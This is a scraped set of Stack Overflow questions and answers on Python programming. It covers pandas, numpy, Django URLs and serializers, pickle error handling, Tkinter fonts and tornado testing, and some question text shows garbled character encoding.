PT2000022152424NT ALFANDEGA DA FE AGROBOM AGROBOM 5350
PT2000022152424NT ALFANDEGA DA FE AGROBOM AGROBOM 5350
PT2000022152424NT ALFANDEGA DA FE AGROBOM AGROBOM 5350
PT2000022153119LM ALFANDEGA DA FE ALFANDEGA DA FE ALFANDEGA DA FE 5350
PT2000022153119LM ALFANDEGA DA FE ALFANDEGA DA FE ALFANDEGA DA FE 5350
PT2000022153119LM ALFANDEGA DA FE ALFANDEGA DA FE ALFANDEGA DA FE 5350
PT2000022153119LM ALFANDEGA DA FE ALFANDEGA DA FE ALFANDEGA DA FE 5350
</code></pre>
<p>I don't know if it could be a problem when I append the dict into my list, or some kind of conflict when it is trying to convert to csv (which I don't think is the case). </p>
<p>But as I said it works and I have the result that I want when I am debugging, so I can not see what is the problem.</p>
| 0 | 2016-08-03T12:22:37Z | 38,743,642 | <p>You are repeatedly adding the <em>same dictionary</em> to the list. Python containers store <em>references</em>, not copies, so any alteration you make to that dictionary is going to be visible through all those references.</p>
<p>Yes, printing that dictionary before you altered it in a next loop iteration won't show the change you make in the next iteration. You are not printing the dictionaries you added, after all, so you don't see those references reflect the change.</p>
<p>Add a copy of the dictionary instead:</p>
<pre><code>if inner.has_key('CPE'):
data.append(inner.copy())
</code></pre>
<p>You can easily reproduce your problem in an interactive session:</p>
<pre><code>>>> data = []
>>> inner = {'foo': 'bar'}
>>> data.append(inner)
>>> data
[{'foo': 'bar'}]
>>> inner['foo'] = 'spam'
>>> inner
{'foo': 'spam'}
>>> data # note that the data list *also* changed!
[{'foo': 'spam'}]
>>> data = [] # start anew
>>> inner = {'foo': 'bar'}
>>> data.append(inner.copy()) # add a (shallow) copy
>>> data
[{'foo': 'bar'}]
>>> inner['foo'] = 'spam'
>>> data
[{'foo': 'bar'}]
>>> data.append(inner.copy())
>>> data
[{'foo': 'bar'}, {'foo': 'spam'}]
</code></pre>
| 2 | 2016-08-03T12:26:20Z | [
"python",
"pandas"
] |
Graphviz: write result to file | 38,743,578 | <p>I have dataframe</p>
<pre><code>ID domain search_term
111 vk.com вконÑакÑе
111 twitter.com ÑÑйÑбÑк
111 facebook.com ÑвиÑÑеÑ
222 avito.ru кÑпиÑÑ Ð¼Ð°ÑинÑ
222 vk.com вконÑакÑе
333 twitter.com ÑвиÑÑеÑ
333 apple.com кÑпиÑÑ Ð°Ð¹Ñон
333 rbk.ru новоÑÑи
</code></pre>
<p>I try to create chain with nodes and write it to file. I use</p>
<pre><code>domains = df['domain'].values.tolist()
search_terms = df['search_term'].values.tolist()
ids = df['ID'].values.tolist()
f = Digraph('finite_state_machine', filename='fsm.gv', encoding='utf-8')
f.body.extend(['rankdir=LR', 'size="5,5"'])
f.attr('node', shape='circle')
for i, (id, domain, search_term) in enumerate(zip(ids, domains, search_terms)):
if ids[i] == ids[i - 1]:
f.edge(domains[i - 1], domains[i], label=search_terms[i])
f.view()
</code></pre>
<p>It returns <a href="http://i.stack.imgur.com/YbhSq.png" rel="nofollow"><img src="http://i.stack.imgur.com/YbhSq.png" alt="this file"></a>
But I want to save it to file, like number of <code>ID</code>. I need to get file <code>111, 222, 333</code>.
I try</p>
<pre><code>for i, (id, domain, search_term) in enumerate(zip(ids, domains, search_terms)):
if ids[i] == ids[i - 1]:
f = Digraph('finite_state_machine', filename='fsm.gv', encoding='utf-8')
f.body.extend(['rankdir=LR', 'size="5,5"'])
f.attr('node', shape='circle')
f.edge(domains[i - 1], domains[i], label=search_terms[i])
f.render(filename=str(id))
</code></pre>
<p>But It works wrong. It should return to <code>111</code> and <code>333</code> chain with 3 nodes, but in file I get chains with 2 nodes to <code>111</code> and <code>333</code>. This file to <code>111</code>:
<a href="http://i.stack.imgur.com/Mb431.png" rel="nofollow"><img src="http://i.stack.imgur.com/Mb431.png" alt="result"></a>
What I do wrong and how can I fix that?</p>
| 0 | 2016-08-03T12:24:00Z | 38,743,987 | <p>Do not put <code>f = Digraph(...)</code> and <code>f.render(...)</code> inside the <code>if-statement</code>. The code inside the <code>if-statement</code> should get executed once for every edge. You do not want to create a new <code>Digraph</code> and render it for every edge.</p>
<p>So instead, you could use <code>df.groupby</code> to have Pandas identify the rows with the same <code>ID</code>. Then call <code>f = Digraph(...)</code> and <code>f.render(...)</code> once for every group:</p>
<pre><code>for id_key, group in df.groupby('ID'):
f = Digraph('finite_state_machine', filename='fsm.gv', encoding='utf-8')
f.body.extend(['rankdir=LR', 'size="5,5"'])
f.attr('node', shape='circle')
for i in range(len(group)-1):
f.edge(group['domain'].iloc[i], group['domain'].iloc[i+1],
label=group['search_term'].iloc[i+1])
f.render(filename=str(id_key))
</code></pre>
| 2 | 2016-08-03T12:40:54Z | [
"python",
"pandas",
"matplotlib",
"graphviz"
] |
EOF Error Pickle | 38,743,646 | <p>I am looping through a list of Pickled files and some of my files have EOF Errors, which means they did not write properly. Is there a way to loop around the files that have these errors and continue to the next file instead of the entire script stopping?</p>
| -2 | 2016-08-03T12:26:35Z | 38,743,699 | <p>Use <code>try/except</code>:</p>
<pre><code>for pkl_file in pkls:
try:
obj = pickle.load(..) # or however you load the file
except EOFError:
continue
# rest of code, handling obj
</code></pre>
| 1 | 2016-08-03T12:28:46Z | [
"python",
"pickle"
] |
EOF Error Pickle | 38,743,646 | <p>I am looping through a list of Pickled files and some of my files have EOF Errors, which means they did not write properly. Is there a way to loop around the files that have these errors and continue to the next file instead of the entire script stopping?</p>
| -2 | 2016-08-03T12:26:35Z | 38,743,923 | <p>First of all, ensure that you are opening the pickle files in <em>binary</em> mode as this is a potential cause of EOF errors when reading/writing pickle data.</p>
<p>When you are reading the pickle files use <code>rb</code> mode when calling <a href="https://docs.python.org/3/library/functions.html?highlight=open#open" rel="nofollow"><code>open()</code></a>. Similarly, if it is your code that is writing the pickle files, ensure that the files are written in binary mode by specifying mode <code>wb</code>.</p>
<p>Secondly catch the exception and ignore it, where "ignore" means that you issue a warning message so any genuinely bad pickle files will be noticed.</p>
<pre><code>import cPickle as pickle
for filename in pickle_files:
try:
with open(filename, 'rb') as f:
data = pickle.load(f)
# use the data
except EOFError as exc:
print(exc)
</code></pre>
| 0 | 2016-08-03T12:38:18Z | [
"python",
"pickle"
] |
how to use pandas dataframe after splitting my test set? | 38,743,888 | <p>i have recently learned how to do validation split on my pandas dataframe , but after spliting i noticed that i am not able to slice my columns . </p>
<pre><code>print(my_data['column name'])
</code></pre>
<p>it throwing an error , please help . </p>
<p>my code goes like this :</p>
<pre><code>import pandas as pd
from sklearn.cross_validation import train_test_split
data = pd.read_csv("labeledTrainData.tsv" , header = 0 , \
delimiter = '\t' , quoting = 3)
train , test = train_test_split(data , train_size = 0.8 , random_state = 38)
print(len(train['sentiment']))
</code></pre>
<p>please tell me whether this problem is faced in numpy too?</p>
| 1 | 2016-08-03T12:36:21Z | 38,744,020 | <p><a href="http://scikit-learn.org/stable/modules/generated/sklearn.cross_validation.train_test_split.html" rel="nofollow"><code>train_test_split</code></a> returns a list of the splits, you're supposed to use these to index the df:</p>
<pre><code>X_train, X_test, y_train, y_test =train_test_split(data , train_size = 0.8 , random_state = 38)
</code></pre>
<p>then you index like so:</p>
<pre><code>data.iloc[X_train]
data.iloc[X_test]
data.iloc[y_train]
data.iloc[y_test]
</code></pre>
| 3 | 2016-08-03T12:42:20Z | [
"python",
"validation",
"pandas",
"numpy",
"scikit-learn"
] |
how to use pandas dataframe after splitting my test set? | 38,743,888 | <p>i have recently learned how to do validation split on my pandas dataframe , but after spliting i noticed that i am not able to slice my columns . </p>
<pre><code>print(my_data['column name'])
</code></pre>
<p>it throwing an error , please help . </p>
<p>my code goes like this :</p>
<pre><code>import pandas as pd
from sklearn.cross_validation import train_test_split
data = pd.read_csv("labeledTrainData.tsv" , header = 0 , \
delimiter = '\t' , quoting = 3)
train , test = train_test_split(data , train_size = 0.8 , random_state = 38)
print(len(train['sentiment']))
</code></pre>
<p>please tell me whether this problem is faced in numpy too?</p>
| 1 | 2016-08-03T12:36:21Z | 38,744,439 | <p>If we input simple numpy arrays the output are numpy arrays too. See an example <a href="http://scikit-learn.org/stable/modules/generated/sklearn.cross_validation.train_test_split.html" rel="nofollow">here</a> :</p>
<pre><code>>>> import numpy as np
>>> from sklearn.cross_validation import train_test_split
>>> X, y = np.arange(10).reshape((5, 2)), range(5)
>>> X
array([[0, 1],
[2, 3],
[4, 5],
[6, 7],
[8, 9]])
>>> list(y)
[0, 1, 2, 3, 4]
>>>
>>> X_train, X_test, y_train, y_test = train_test_split(
... X, y, test_size=0.33, random_state=42)
...
>>> X_train
array([[4, 5],
[0, 1],
[6, 7]])
>>> y_train
[2, 0, 3]
>>> X_test
array([[2, 3],
[8, 9]])
>>> y_test
[1, 4]
</code></pre>
<h1>EDIT</h1>
<p>I tried the same thing but i did not get any errors, I am using Python 2.7+. So is this something specific to different version of Python or Scikitlearn</p>
<pre><code> import pandas as pd
from sklearn.cross_validation import train_test_split
url = 'https://raw.github.com/pydata/pandas/master/pandas/tests/data/tips.csv'
data = pd.read_csv(url)
train , test = train_test_split(data ,train_size = 0.8 , random_state = 38)
print (train['total_bill'])
Output:
....
211 25.89
53 9.94
75 10.51
161 12.66
Name: total_bill, dtype: float64
</code></pre>
| 0 | 2016-08-03T13:01:16Z | [
"python",
"validation",
"pandas",
"numpy",
"scikit-learn"
] |
See current logging config in Python (Django) | 38,744,092 | <p>I am setting up logging in Django, but for some reason I see no logs appear. Django uses Python's <code>logging</code> module (I use Python 2.7).</p>
<p>Is there a way I can see the currently configured logging setup, something like a <code>logging.getConfigDict()</code> or so?</p>
| 1 | 2016-08-03T12:45:12Z | 38,765,453 | <p>There's the <code>logging_tree</code> module for that:</p>
<p><code>pip install logging_tree</code></p>
<p>and then (via <code>./manage.py shell</code>)</p>
<pre><code>import logging_tree
logging_tree.printout()
</code></pre>
<p>More infos: <a href="http://rhodesmill.org/brandon/2012/logging_tree/" rel="nofollow">http://rhodesmill.org/brandon/2012/logging_tree/</a></p>
| 1 | 2016-08-04T10:57:40Z | [
"python",
"django",
"logging"
] |
glob error <_io.TextIOWrapper name='...' mode='r' encoding='cp1252'> reading text file error | 38,744,244 | <p>I am trying to make a social program where the profiles are stored in .txt files
here is part of the code:</p>
<pre><code>XX = []
pl = glob.glob('*.txt')
for a in pl:
if ' pysocial profile.txt' in a:
print(a)
O = 2
XX.append(a)
if O == 2:
P = input('choose profile>')
if P in XX:
G = open(P, 'r')
print(G)
</code></pre>
<p>I try this
but when it executes the "print(G)" part it come out with this:</p>
<pre><code><_io.TextIOWrapper name='Freddie Taylor pysocial profile.txt' mode='r' encoding='cp1252'>
</code></pre>
<p>how can I make it read the file?</p>
| -3 | 2016-08-03T12:52:30Z | 38,744,973 | <p>The <code>open</code> method opens the file and returns a <code>TextIOWrapper</code> object but does not read the files content.</p>
<p>To actually get the content of the file, you need to call the <code>read</code> method on that object, like so:</p>
<pre><code>G = open(P, 'r')
print(G.read())
</code></pre>
<p>However, you should take care of closing the file by either calling the <code>close</code> method on the file object or using the <code>with open(...)</code> syntax which will ensure the file is properly closed, like so:</p>
<pre><code>with open(P, 'r') as G:
print(G.read())
</code></pre>
| 0 | 2016-08-03T13:26:08Z | [
"python"
] |
format date 'Fri Apr 15 04_01_33 2016' and '2015-12-16 22-39-28' Using python datetime format date | 38,744,270 | <p>Here is Simples way to format date using datetime</p>
<pre><code>from datetime import datetime
date = '2016-04-07 04-54-53'
date1 = 'Fri Apr 15 04_01_33 2016'
format = "%Y-%m-%d %H-%M-%S"
format1 = "%a %b %d %H_%M_%S %Y"
datetime = datetime.strptime(date, format)
datetime1 = datetime.strptime(date1, format1)
print(datetime)
print(datetime1)
</code></pre>
<p>Output :</p>
<pre><code>2016-04-07 04:54:53
2016-04-15 04:01:33
</code></pre>
| -5 | 2016-08-03T12:53:41Z | 38,744,299 | <p><strong>Simples way to format date using datetime</strong></p>
<pre><code>from datetime import datetime
date = '2016-04-07 04-54-53'
date1 = 'Fri Apr 15 04_01_33 2016'
format = "%Y-%m-%d %H-%M-%S"
format1 = "%a %b %d %H_%M_%S %Y"
datetime = datetime.strptime(date, format)
datetime1 = datetime.strptime(date1, format1)
print(datetime)
print(datetime1)
</code></pre>
<p>Output :</p>
<pre><code>2016-04-07 04:54:53
2016-04-15 04:01:33
</code></pre>
<p>Vote if you get right ans</p>
| 0 | 2016-08-03T12:55:13Z | [
"python",
"django",
"datetime"
] |
Django URLs error: view must be a callable or a list/tuple in the case of include() | 38,744,285 | <p>After upgrading to Django 1.10, I get the error:</p>
<pre><code>TypeError: view must be a callable or a list/tuple in the case of include().
</code></pre>
<p>My urls.py is as follows:</p>
<pre><code>urlpatterns = [
url(r'^$', 'myapp.views.home'),
url(r'^contact$', 'myapp.views.contact'),
url(r'^login/$', 'django.contrib.auth.views.login'),
]
</code></pre>
<p>The full traceback is:</p>
<pre><code>Traceback (most recent call last):
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/utils/autoreload.py", line 226, in wrapper
fn(*args, **kwargs)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/management/commands/runserver.py", line 121, in inner_run
self.check(display_num_errors=True)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/management/base.py", line 385, in check
include_deployment_checks=include_deployment_checks,
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/management/base.py", line 372, in _run_checks
return checks.run_checks(**kwargs)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/checks/registry.py", line 81, in run_checks
new_errors = check(app_configs=app_configs)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/checks/urls.py", line 14, in check_url_config
return check_resolver(resolver)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/checks/urls.py", line 24, in check_resolver
for pattern in resolver.url_patterns:
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/utils/functional.py", line 35, in __get__
res = instance.__dict__[self.name] = self.func(instance)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/urls/resolvers.py", line 310, in url_patterns
patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/utils/functional.py", line 35, in __get__
res = instance.__dict__[self.name] = self.func(instance)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/urls/resolvers.py", line 303, in urlconf_module
return import_module(self.urlconf_name)
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/importlib/__init__.py", line 37, in import_module
__import__(name)
File "/Users/alasdair/dev/urlproject/urlproject/urls.py", line 28, in <module>
url(r'^$', 'myapp.views.home'),
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/conf/urls/__init__.py", line 85, in url
raise TypeError('view must be a callable or a list/tuple in the case of include().')
TypeError: view must be a callable or a list/tuple in the case of include().
</code></pre>
| 6 | 2016-08-03T12:54:34Z | 38,744,286 | <p>Django 1.10 no longer allows you to specify views as a string (e.g. <code>'myapp.views.home'</code>) in your URL patterns.</p>
<p>The solution is to update your <code>urls.py</code> to include the view callable. This means that you have to import the view in your <code>urls.py</code>. If your URL patterns don't have names, then now is a good time to add one, because reversing with the dotted python path no longer works.</p>
<pre><code>from django.contrib.auth.views import login
from myapp.views import home, contact
urlpatterns = [
url(r'^$', home, name='home'),
url(r'^contact$', contact, name='contact'),
url(r'^login/$', login, name='login'),
]
</code></pre>
<p>If there are many views, then importing them individually can be inconvenient. An alternative is to import the views module from your app. </p>
<pre><code>from django.contrib.auth import views as auth_views
from myapp import views as myapp_views
urlpatterns = [
url(r'^$', myapp_views.home, name='home'),
url(r'^contact$', myapp_views.contact, name='contact'),
url(r'^login/$', auth_views.login, name='login'),
]
</code></pre>
<p>Note that we have used <code>as myapp_views</code> and <code>as auth_views</code>, which allows us to import the <code>views.py</code> from multiple apps without them clashing.</p>
<p>See the <a href="https://docs.djangoproject.com/en/1.10/topics/http/urls/#url-dispatcher">Django URL dispatcher docs</a> for more information about <code>urlpatterns</code>.</p>
| 20 | 2016-08-03T12:54:34Z | [
"python",
"django",
"django-urls",
"django-1.10"
] |
Django URLs error: view must be a callable or a list/tuple in the case of include() | 38,744,285 | <p>After upgrading to Django 1.10, I get the error:</p>
<pre><code>TypeError: view must be a callable or a list/tuple in the case of include().
</code></pre>
<p>My urls.py is as follows:</p>
<pre><code>urlpatterns = [
url(r'^$', 'myapp.views.home'),
url(r'^contact$', 'myapp.views.contact'),
url(r'^login/$', 'django.contrib.auth.views.login'),
]
</code></pre>
<p>The full traceback is:</p>
<pre><code>Traceback (most recent call last):
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/utils/autoreload.py", line 226, in wrapper
fn(*args, **kwargs)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/management/commands/runserver.py", line 121, in inner_run
self.check(display_num_errors=True)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/management/base.py", line 385, in check
include_deployment_checks=include_deployment_checks,
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/management/base.py", line 372, in _run_checks
return checks.run_checks(**kwargs)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/checks/registry.py", line 81, in run_checks
new_errors = check(app_configs=app_configs)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/checks/urls.py", line 14, in check_url_config
return check_resolver(resolver)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/checks/urls.py", line 24, in check_resolver
for pattern in resolver.url_patterns:
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/utils/functional.py", line 35, in __get__
res = instance.__dict__[self.name] = self.func(instance)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/urls/resolvers.py", line 310, in url_patterns
patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/utils/functional.py", line 35, in __get__
res = instance.__dict__[self.name] = self.func(instance)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/urls/resolvers.py", line 303, in urlconf_module
return import_module(self.urlconf_name)
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/importlib/__init__.py", line 37, in import_module
__import__(name)
File "/Users/alasdair/dev/urlproject/urlproject/urls.py", line 28, in <module>
url(r'^$', 'myapp.views.home'),
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/conf/urls/__init__.py", line 85, in url
raise TypeError('view must be a callable or a list/tuple in the case of include().')
TypeError: view must be a callable or a list/tuple in the case of include().
</code></pre>
| 6 | 2016-08-03T12:54:34Z | 38,837,787 | <p>This error just means that <code>myapp.views.home</code> is not something that can be called, like a function. It is a string in fact. While your solution works in django 1.9, nevertheless it throws a warning saying this will deprecate from version 1.10 onwards, which is exactly what has happened. The previous solution by @Alasdair imports the necessary view functions into the script through either
<code>from myapp import views as myapp_views</code> or
<code>from myapp.views import home, contact</code></p>
| 1 | 2016-08-08T20:16:22Z | [
"python",
"django",
"django-urls",
"django-1.10"
] |
Custom serializer issue in django with json data | 38,744,349 | <p>I cant get my serializer to work correctly on a foreign key field any help would be greatly appreciated. </p>
<p>Here is the error </p>
<p>dim_json = DimensionSerializer(dim_data) </p>
<p>print dim_json </p>
<p>DimensionSerializer([, , , , , ]): </p>
<pre><code>id = IntegerField(label='ID', read_only=True)
description = CharField(max_length=255)
style = CharField(max_length=255)
created_at = DateField()
updated_at = DateField()
target = IntegerField()
upper_limit = IntegerField()
lower_limit = IntegerField()
inspection_tool = CharField(max_length=255)
critical = IntegerField()
units = CharField(max_length=255)
metric = CharField(max_length=255)
target_strings = CharField(max_length=255)
ref_dim_id = IntegerField()
nested_number = IntegerField()
met_upper = IntegerField()
met_lower = IntegerField()
valc = CharField(max_length=255)
sheet = PrimaryKeyRelatedField(queryset=Sheet.objects.all(), required=False)
</code></pre>
<p>serializers.py </p>
<pre><code>from rest_framework import serializers
from app.models import Dimension, Sheet, Customer
class DimensionSerializer(serializers.ModelSerializer):
description = serializers.CharField(max_length=255)
style = serializers.CharField(max_length=255)
created_at = serializers.DateField()
updated_at = serializers.DateField()
target = serializers.IntegerField()
upper_limit = serializers.IntegerField()
lower_limit = serializers.IntegerField()
inspection_tool = serializers.CharField(max_length=255)
critical = serializers.IntegerField()
units = serializers.CharField(max_length=255)
metric = serializers.CharField(max_length=255)
target_strings = serializers.CharField(max_length=255)
ref_dim_id = serializers.IntegerField()
nested_number = serializers.IntegerField()
#position = serializers.IntegerField()
met_upper = serializers.IntegerField()
met_lower = serializers.IntegerField()
valc = serializers.CharField(max_length=255)
#if found this with a google search but still does not work and continues to give error. .....
sheet = SheetSerializer(many=True)
class Meta:
model = Dimension
read_only_fields = ('id', 'created_at', 'updated_at', 'posistion', sheet)
class SheetSerializer(serializers.ModelSerializer):
create_date = serializers.DateField()
updated_date = serializers.DateField()
customer_name = serializers.CharField(max_length=255)
part_number = serializers.CharField(max_length=255)
part_revision = serializers.CharField(max_length=255)
work_order = serializers.CharField(max_length=255)
purchase_order = serializers.CharField(max_length=255)
sample_size = serializers.IntegerField()
sample_scheme = serializers.CharField(max_length=255)
overide_scheme = serializers.IntegerField()
template = serializers.IntegerField()
sample_schem_percent = serializers.IntegerField()
critical_dimensions = serializers.IntegerField()
closed = serializers.IntegerField()
serial_index = serializers.CharField(max_length=255)
drawing_number = serializers.CharField(max_length=255)
drawing_revision = serializers.CharField(max_length=255)
heat_number = serializers.CharField(max_length=255)
note = serializers.CharField(max_length=255)
valc = serializers.CharField(max_length=255)
customer = CustomerSerializer(many=True)
class Meta:
model = Sheet
read_only_fields = ('id', 'create_date', 'updated_at')
class CustomerSerializer(serializers.ModelSerializer):
customer_id = serializers.IntegerField()
customer_name = serializers.CharField(max_length=255)
created_at = serializers.DateField()
updated_at = serializers.DateField()
</code></pre>
<p>models.py </p>
<pre><code>class Dimension(models.Model):
description = models.CharField(max_length=255)
style = models.CharField(max_length=255)
created_at = models.DateField()
updated_at = models.DateField()
target = models.IntegerField()
upper_limit = models.IntegerField()
lower_limit = models.IntegerField()
inspection_tool = models.CharField(max_length=255)
critical = models.IntegerField()
units = models.CharField(max_length=255)
metric = models.CharField(max_length=255)
target_strings = models.CharField(max_length=255)
ref_dim_id = models.IntegerField()
nested_number = models.IntegerField()
met_upper = models.IntegerField()
met_lower = models.IntegerField()
valc = models.CharField(max_length=255)
sheet = models.ForeignKey(Sheet, on_delete=models.CASCADE, default=DEFAULT_FOREIGN_KEY)
class Customer(models.Model):
objects = CustomerManager()
customer_id = models.IntegerField()
customer_name = models.CharField(max_length=255)
created_at = models.DateField
updated_at = models.DateField
class Sheet(models.Model):
objects = SheetManager()
create_date = models.DateField()
updated_date = models.DateField()
customer_name = models.CharField(max_length=255)
part_number = models.CharField(max_length=255)
part_revision = models.CharField(max_length=255)
work_order = models.CharField(max_length=255)
purchase_order = models.CharField(max_length=255)
sample_size = models.IntegerField()
sample_scheme = models.CharField(max_length=255)
overide_scheme = models.IntegerField()
template = models.IntegerField()
sample_schem_percent = models.IntegerField()
critical_dimensions = models.IntegerField()
closed = models.IntegerField()
serial_index = models.CharField(max_length=255)
drawing_number = models.CharField(max_length=255)
drawing_revision = models.CharField(max_length=255)
heat_number = models.CharField(max_length=255)
note = models.CharField(max_length=255)
valc = models.CharField(max_length=255)
customer = models.ForeignKey(Customer, on_delete=models.CASCADE, default=DEFAULT_FOREIGN_KEY)
</code></pre>
| -1 | 2016-08-03T12:57:04Z | 38,747,901 | <p>I figured it out instead of using my custom serializer I just used the django.core one and presto it works. </p>
<pre><code>dim_json = serializer.serialize('json', Dimension.objects.all())
print dim_json
</code></pre>
| 0 | 2016-08-03T15:31:14Z | [
"python",
"json",
"django",
"django-serializer"
] |
Numpy array 15min values - hourly mean values | 38,744,353 | <p>I have the following situation:</p>
<p>A numpy array</p>
<pre><code>x = np.array([12,3,34,5...,])
</code></pre>
<p>where every entry corresponds to a simulation result (time-step 15min).</p>
<p>Now I need the mean hourly value (mean value of first 4 elements, then next 4, etc.) stored in a new numpy array. Is there a very simple method to accomplish this?</p>
| 2 | 2016-08-03T12:57:16Z | 38,744,446 | <pre><code>N = 4
mod_ = x.size % N
x1 = np.pad(x.astype(float), (0, (mod_ > 0) * (N - mod_)), 'constant', constant_values=(np.nan,))
x2 = np.reshape(x1, (int(x1.size/4), 4))
x3 = np.nanmean(x2, axis=1)
print(x3)
</code></pre>
| 1 | 2016-08-03T13:01:35Z | [
"python",
"numpy"
] |
Numpy array 15min values - hourly mean values | 38,744,353 | <p>I have the following situation:</p>
<p>A numpy array</p>
<pre><code>x = np.array([12,3,34,5...,])
</code></pre>
<p>where every entry corresponds to a simulation result (time-step 15min).</p>
<p>Now I need the mean hourly value (mean value of first 4 elements, then next 4, etc.) stored in a new numpy array. Is there a very simple method to accomplish this?</p>
| 2 | 2016-08-03T12:57:16Z | 38,744,742 | <p>To handle arrays whose size may not be a multiple of 4,
copy <code>x</code> into a new array, <code>tmp</code>, whose size is a multiple of 4:</p>
<pre><code>tmp = np.full((((x.size-1) // 4)+1)*4, dtype=float, fill_value=np.nan)
tmp[:x.size] = x
</code></pre>
<p>Empty values are represented by <code>nan</code>. Then you can reshape and use <code>nanmean</code> to compute the mean for each row. <code>np.nanmean</code> is like <code>np.mean</code> except that it ignores <code>nan</code>s:</p>
<hr>
<pre><code>x = np.array([12,3,34,5,1])
tmp = np.full((((x.size-1) // 4)+1)*4, dtype=float, fill_value=np.nan)
tmp[:x.size] = x
tmp = tmp.reshape(-1, 4)
print(np.nanmean(tmp, axis=1))
</code></pre>
<p>prints</p>
<pre><code>[ 13.5 1. ]
</code></pre>
<hr>
<p>If you have <a href="http://pandas.pydata.org/" rel="nofollow">pandas</a> installed, then you could build a timeseries and group by a time interval:</p>
<pre><code>import numpy as np
import pandas as pd
x = np.array([12,3,34,5,1])
s = pd.Series(x, index=pd.date_range('2000-1-1', periods=x.size, freq='15T'))
result = s.groupby(pd.TimeGrouper('1H')).mean()
print(result)
</code></pre>
<p>yields</p>
<pre><code>2000-01-01 00:00:00 13.5
2000-01-01 01:00:00 1.0
Freq: H, dtype: float64
</code></pre>
| 2 | 2016-08-03T13:14:54Z | [
"python",
"numpy"
] |
Numpy array 15min values - hourly mean values | 38,744,353 | <p>I have the following situation:</p>
<p>A numpy array</p>
<pre><code>x = np.array([12,3,34,5...,])
</code></pre>
<p>where every entry corresponds to a simulation result (time-step 15min).</p>
<p>Now I need the mean hourly value (mean value of first 4 elements, then next 4, etc.) stored in a new numpy array. Is there a very simple method to accomplish this?</p>
| 2 | 2016-08-03T12:57:16Z | 38,746,311 | <p>Here is another solution:</p>
<p>your input:</p>
<pre><code>In [11]: x = np.array([12, 3, 34, 5, 1, 2, 3])
</code></pre>
<p>taking every 4 elements in b</p>
<pre><code>In [12]: b = [x[n:n+4] for n in range(0, len(x), 4)]
</code></pre>
<p>create new empty list to append results</p>
<pre><code>In [13]: l = []
In [14]: for i in b:
....: l.append(np.mean(i))
....:
In [15]: l
Out[15]: [13.5, 2.0]
</code></pre>
| 1 | 2016-08-03T14:22:09Z | [
"python",
"numpy"
] |
Tkinter Text widget: Configure font | 38,744,394 | <p>I have <code>Text</code> widget that I can configure the font families by:</p>
<pre><code>textwidget.config(font=(Consolas,13))
</code></pre>
<p>That would configure the whole <code>text</code> Widget. I only want to tell <code>Tkinter</code> I want to make every input after the <code>Text</code> widget has been configured to be like how I changed it.</p>
<p>How can I achieve this. Thanks for any help !!</p>
| 0 | 2016-08-03T12:59:10Z | 38,781,382 | <p>Have a look at the <code>tag</code> commands. You can change the selected text using this code:</p>
<pre><code>number=0
def fontchange():
textwidget.tag_add(str(number), SEL_FIRST, SEL_LAST)
textwidget.tag_config(str(number), font=(Consolas,13))
number += 1
</code></pre>
<p>Obviously this is a very basic changer but if you want to change it to the end you could change the SEL_LAST to END. Read this <a href="http://effbot.org/tkinterbook/text.htm" rel="nofollow">site</a> for more info on tags.</p>
| 1 | 2016-08-05T04:54:39Z | [
"python",
"text",
"fonts",
"tkinter",
"configuration"
] |
How to test `@authenticated` handler using tornado.testing? | 38,744,453 | <p>I am new to unit testing using script. I tried to verify login with arguments in post data, but I am getting login page as response and not get logged in.Because of <code>@tornado.web.authenticated</code> i can't access other functions without login and it responding to login page</p>
<pre><code>import tornado
from tornado.testing import AsyncTestCase
from tornado.web import Application, RequestHandler
import app
import urllib
class MyTestCase(AsyncTestCase):
@tornado.testing.gen_test
def test_http_fetch_login(self):
data = urllib.urlencode(dict(username='admin', password=''))
client = AsyncHTTPClient(self.io_loop)
response = yield client.fetch("http://localhost:8888/console/login/?", method="POST",body=data)
# Test contents of response
self.assertIn("Automaton web console", response.body)
@tornado.testing.gen_test
def test_http_fetch_config(self):
client = AsyncHTTPClient(self.io_loop)
response = yield client.fetch("http://localhost:8888/console/configuration/?")
self.assertIn("server-version",response.body)
</code></pre>
| 0 | 2016-08-03T13:01:55Z | 38,778,310 | <p>To test code that uses <code>@authenticated</code> (unless you are testing the redirection to the login page itself), you need to pass a cookie (or whatever form of authentication you're using) that will be accepted by your <code>get_current_user</code> method. The details of this will vary depending on how exactly you are doing your authentication, but if you're using Tornado's secure cookies you'll probably use the <code>create_signed_value</code> function to encode a cookie. </p>
| 0 | 2016-08-04T22:20:14Z | [
"python",
"unit-testing",
"web-applications",
"tornado"
] |
